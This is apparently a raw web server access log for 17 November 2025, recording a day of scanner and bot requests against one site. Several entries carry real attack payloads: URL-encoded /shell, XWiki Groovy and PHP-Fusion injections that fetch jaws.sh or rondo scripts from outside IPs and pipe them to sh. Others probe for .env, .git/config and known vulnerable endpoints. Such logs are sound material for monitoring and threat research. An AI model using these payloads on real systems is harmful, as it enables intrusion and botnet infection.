176.65.149.19 - - [17/Nov/2025:00:08:56 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 205.210.31.99 - - [17/Nov/2025:00:47:51 +0100] "GET / HTTP/1.1" 200 1895 52.90.163.28 - - [17/Nov/2025:00:47:58 +0100] "GET / HTTP/1.1" 200 1895 65.49.1.202 - - [17/Nov/2025:01:16:37 +0100] "GET / HTTP/1.1" 200 1895 65.49.1.202 - - [17/Nov/2025:01:16:59 +0100] "GET /favicon.ico HTTP/1.1" 404 729 65.49.1.208 - - [17/Nov/2025:01:17:09 +0100] "GET /?format=json HTTP/1.1" 200 1895 65.49.1.211 - - [17/Nov/2025:01:17:14 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804 65.49.1.202 - - [17/Nov/2025:01:17:19 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740 198.235.24.113 - - [17/Nov/2025:01:19:04 +0100] "-" 400 1930 198.235.24.113 - - [17/Nov/2025:01:19:04 +0100] "-" 400 1930 192.241.154.87 - - [17/Nov/2025:01:22:21 +0100] "GET / HTTP/1.1" 200 1895 176.65.148.99 - - [17/Nov/2025:01:23:57 +0100] "POST /login HTTP/1.1" 404 723 205.210.31.56 - - [17/Nov/2025:01:27:45 +0100] "GET / HTTP/1.0" 200 1895 87.120.191.121 - - [17/Nov/2025:01:39:24 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [17/Nov/2025:02:08:23 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 47.250.80.213 - - [17/Nov/2025:02:36:37 +0100] "GET / HTTP/1.1" 200 1895 123.160.223.79 - - [17/Nov/2025:02:37:21 +0100] "GET / HTTP/1.1" 200 1895 111.7.96.178 - - [17/Nov/2025:02:37:22 +0100] "GET / HTTP/1.1" 200 1895 123.160.223.79 - - [17/Nov/2025:02:37:22 +0100] "GET /favicon.ico HTTP/1.1" 404 729 111.7.96.178 - - [17/Nov/2025:02:37:22 +0100] "GET /favicon.ico HTTP/1.1" 404 729 20.163.3.80 - - [17/Nov/2025:02:51:45 +0100] "GET /hudson HTTP/1.1" 404 724 91.92.242.214 - - [17/Nov/2025:03:19:19 +0100] "-" 400 1930 176.65.149.19 - - [17/Nov/2025:03:22:31 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 193.142.147.209 - - [17/Nov/2025:03:23:32 +0100] "GET / HTTP/1.1" 200 1895 87.120.191.121 - - [17/Nov/2025:03:42:21 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [17/Nov/2025:04:48:56 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 176.65.149.19 - - [17/Nov/2025:05:07:40 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.101 - - [17/Nov/2025:05:24:28 +0100] "GET /shell?cd%20%2Ftmp%3Bwget%20http%3A%2F%2F213.209.143.37%2Fjaws.sh%3Bcurl%20-O%20http%3A%2F%2F213.209.143.37%2Fjaws.sh%3B%20chmod%20777%20jaws.sh%3Bsh%20jaws.sh%3Brm%20-rf%20jaws.sh HTTP/1.1" 404 723 94.103.0.190 - - [17/Nov/2025:05:48:20 +0100] "GET / HTTP/1.1" 200 1895 176.65.149.19 - - [17/Nov/2025:06:06:55 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 193.142.147.209 - - [17/Nov/2025:06:10:59 +0100] "GET / HTTP/1.1" 200 1895 18.97.19.223 - - [17/Nov/2025:06:14:17 +0100] "GET / HTTP/1.1" 200 1895 149.88.26.97 - - [17/Nov/2025:06:16:43 +0100] "-" 400 1930 71.6.232.23 - - [17/Nov/2025:07:00:03 +0100] "GET / HTTP/1.1" 200 1895 194.165.16.163 - - [17/Nov/2025:07:33:30 +0100] "-" 400 1930 15.235.73.238 - - [17/Nov/2025:07:37:15 +0100] "HEAD / HTTP/1.1" 200 - 176.65.149.19 - - [17/Nov/2025:07:39:25 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.95 - - [17/Nov/2025:08:20:15 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [17/Nov/2025:08:20:15 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [17/Nov/2025:08:20:15 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [17/Nov/2025:08:20:15 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [17/Nov/2025:08:20:15 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [17/Nov/2025:08:20:16 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759 46.101.161.47 - - [17/Nov/2025:08:21:35 +0100] "GET /.env HTTP/1.1" 404 722 46.101.161.47 - - [17/Nov/2025:08:21:35 +0100] "GET /.git/config HTTP/1.1" 404 733 87.128.63.137 - - [17/Nov/2025:09:00:33 +0100] "GET / HTTP/1.0" 200 1895 81.161.239.26 - - [17/Nov/2025:09:18:57 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [17/Nov/2025:09:34:09 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 176.65.149.19 - - [17/Nov/2025:10:23:43 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 74.82.47.5 - - [17/Nov/2025:10:34:54 +0100] "-" 400 1930 176.65.149.19 - - [17/Nov/2025:10:48:59 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 176.65.149.19 - - [17/Nov/2025:11:46:46 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 193.142.147.209 - - [17/Nov/2025:12:13:56 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 178.238.236.27 - - [17/Nov/2025:12:34:33 +0100] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 771 121.127.34.107 - - [17/Nov/2025:12:39:14 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 81.161.239.26 - - [17/Nov/2025:12:47:56 +0100] "GET / HTTP/1.1" 200 1895 176.65.149.19 - - [17/Nov/2025:13:02:55 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 193.142.147.209 - - [17/Nov/2025:13:13:45 +0100] "GET / HTTP/1.1" 200 1895 170.64.177.80 - - [17/Nov/2025:15:59:50 +0100] "GET /aaa9 HTTP/1.1" 404 722 170.64.177.80 - - [17/Nov/2025:15:59:51 +0100] "GET /aab8 HTTP/1.1" 404 722 170.64.177.80 - - [17/Nov/2025:15:59:52 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [17/Nov/2025:16:08:46 +0100] "GET / HTTP/1.1" 200 1895 66.132.153.51 - - [17/Nov/2025:17:03:56 +0100] "GET / HTTP/1.1" 200 1895 66.132.153.51 - - [17/Nov/2025:17:03:59 +0100] "-" 400 1930 66.132.153.51 - - [17/Nov/2025:17:03:59 +0100] "GET / HTTP/1.1" 200 1895 66.132.153.51 - - [17/Nov/2025:17:03:59 +0100] "GET /favicon.ico HTTP/1.1" 404 729 66.132.153.51 - - [17/Nov/2025:17:04:03 +0100] "-" 400 1930 66.132.153.51 - - [17/Nov/2025:17:04:03 +0100] "GET /robots.txt HTTP/1.1" 404 728 81.161.239.26 - - [17/Nov/2025:17:29:19 +0100] "GET / HTTP/1.1" 200 1895 45.135.193.9 - - [17/Nov/2025:18:22:49 +0100] "GET /json/ HTTP/1.1" 404 727 31.41.89.60 - - [17/Nov/2025:19:07:04 +0100] "GET / HTTP/1.1" 200 1895 193.142.147.209 - - [17/Nov/2025:19:16:43 +0100] "GET / HTTP/1.1" 200 1895 143.110.251.161 - - [17/Nov/2025:19:31:40 +0100] "-" 400 1930 143.110.251.161 - - [17/Nov/2025:19:31:41 +0100] "-" 400 1930 143.110.251.161 - - [17/Nov/2025:19:31:41 +0100] "GET / HTTP/1.1" 200 1895 143.110.251.161 - - [17/Nov/2025:19:31:41 +0100] "GET /download/powershell/ HTTP/1.1" 404 746 143.110.251.161 - - [17/Nov/2025:19:31:42 +0100] "GET /get.php HTTP/1.1" 404 725 20.163.15.154 - - [17/Nov/2025:19:46:55 +0100] "-" 400 1930 176.65.149.19 - - [17/Nov/2025:19:58:28 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 192.159.99.95 - - [17/Nov/2025:20:00:17 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751 192.159.99.95 - - [17/Nov/2025:20:00:17 +0100] "GET / HTTP/1.1" 200 1895 192.159.99.95 - - [17/Nov/2025:20:00:17 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792 192.159.99.95 - - [17/Nov/2025:20:00:17 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750 192.159.99.95 - - [17/Nov/2025:20:00:18 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763 192.159.99.95 - - [17/Nov/2025:20:00:18 +0100] "GET /infusions/downloads/downloads.php?cat_id=$%7Bsystem(wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh)%7D HTTP/1.1" 404 759 192.159.99.180 - - [17/Nov/2025:20:39:33 +0100] "GET /shell?cd%20%2Ftmp%3Bwget%20http%3A%2F%2F213.209.143.37%2Fjaws.sh%3Bcurl%20-O%20http%3A%2F%2F213.209.143.37%2Fjaws.sh%3B%20chmod%20777%20jaws.sh%3Bsh%20jaws.sh%3Brm%20-rf%20jaws.sh HTTP/1.1" 404 723 45.135.193.9 - - [17/Nov/2025:20:46:24 +0100] "GET /json/ HTTP/1.1" 404 727 193.142.147.209 - - [17/Nov/2025:21:09:57 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756 44.220.185.131 - - [17/Nov/2025:21:51:53 +0100] "GET / HTTP/1.1" 200 1895 20.83.27.140 - - [17/Nov/2025:21:53:54 +0100] "GET / HTTP/1.1" 200 1895 20.83.27.140 - - [17/Nov/2025:21:53:54 +0100] "-" 400 1930 193.142.147.209 - - [17/Nov/2025:22:15:20 +0100] "GET / HTTP/1.1" 200 1895 109.105.209.5 - - [17/Nov/2025:22:33:55 +0100] "GET / HTTP/1.1" 200 1895 109.105.209.4 - - [17/Nov/2025:22:33:55 +0100] "GET /favicon.ico HTTP/1.1" 404 729 124.198.132.121 - - [17/Nov/2025:23:05:25 +0100] "GET /shell?cd%20%2Ftmp%3Bwget%20http%3A%2F%2F213.209.143.37%2Fjaws.sh%3Bcurl%20-O%20http%3A%2F%2F213.209.143.37%2Fjaws.sh%3B%20chmod%20777%20jaws.sh%3Bsh%20jaws.sh%3Brm%20-rf%20jaws.sh HTTP/1.1" 404 723 185.91.127.97 - - [17/Nov/2025:23:12:44 +0100] "CONNECT postman-echo.com:443 HTTP/1.1" 400 804 87.251.64.49 - - [17/Nov/2025:23:14:31 +0100] "-" 400 1930 176.65.149.19 - - [17/Nov/2025:23:35:08 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748 98.93.104.117 - - [17/Nov/2025:23:46:03 +0100] "GET / HTTP/1.1" 200 1895 113.219.175.221 - - [17/Nov/2025:23:52:44 +0100] "GET /.env HTTP/1.1" 404 722